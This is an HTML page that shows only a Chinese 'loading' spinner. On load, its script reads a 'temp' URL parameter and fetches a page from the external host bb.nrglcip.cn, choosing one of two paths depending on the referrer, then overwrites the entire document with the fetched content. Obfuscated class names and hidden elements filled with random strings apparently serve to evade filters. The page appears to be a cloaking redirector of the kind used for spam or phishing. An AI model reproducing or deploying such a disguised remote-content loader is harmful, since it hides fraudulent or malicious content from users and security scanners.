<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .zxLl7A {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .zxLl7A .cS8uKvspVJg {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .zxLl7A .content {
            line-height: 50px;
            text-align: center
        }

        .zxLl7A .img {
            width: 100%
        }

        .zxLl7A .oqNhl8 {
            text-align: center
        }

        .zxLl7A .oqNhl8 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .zxLl7A .oqNhl8 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .zxLl7A .oqNhl8 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .zxLl7A .oqNhl8 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .zxLl7A .oqNhl8 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .zxLl7A .oqNhl8 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .zxLl7A .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function fCpLyOiYtOT(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var XaOFXS = fCpLyOiYtOT('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ XaOFXS +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ XaOFXS +".html?a=share";
		}
		
        Wp8DiGgse=url+"#"+new Date().getTime();
        Wp8DiGgse && function() {
            $.get(Wp8DiGgse, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>jecKVdmIzGoklzFMtX1yAhFYf9waKpueSC7NOK9PJmFIbKfJQaLdtNw6X3JS4ySFIrv2J7Wzq3JBdTk3UzCaZGX</a>
<ul style='display:none' >pdVtGqg9S0sHSQGMJHZJ22729bfrrmEW9ChmXllyibYzZO3js</ul>
<p  style='display:none'>TmCqsF6MoF5q2DvUNG73EGt</p>
<div style='display:none'>zIkb6YhZkBgErsQCvmG2piGDify</div>
<a  href='#' style='display:none'>jecKVdmIzGoklzFMtX1yAhFYf9waKpueSC7NOK9PJmFIbKfJQaLdtNw6X3JS4ySFIrv2J7Wzq3JBdTk3UzCaZGX</a>
<img  src='' style='display:none'>
<div style='display:none'>zIkb6YhZkBgErsQCvmG2piGDify</div><div class="zxLl7A">
    <div class="cS8uKvspVJg">
        <div class="oqNhl8">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<h1 style='display:none' >uNwoo1u15uUdR2qRTLGqsmkOfE3f19sUVqv6AORcOTPEC8IJ9YcRHBSdkPpAPw</h1>
<b style='display:none' >cvhFmGOq1owdKhhxSTBoD1CC9NKL6nDZl6ZWgyQ5tUXo2vbEnfynJbAmyoPxRP</b>
<ul style='display:none' >s4MOJUTtRwmoZ0u1yZiw5mizjCkv2qsuXyaRN6S</ul>
<h1 style='display:none' >uNwoo1u15uUdR2qRTLGqsmkOfE3f19sUVqv6AORcOTPEC8IJ9YcRHBSdkPpAPw</h1></body>
</html>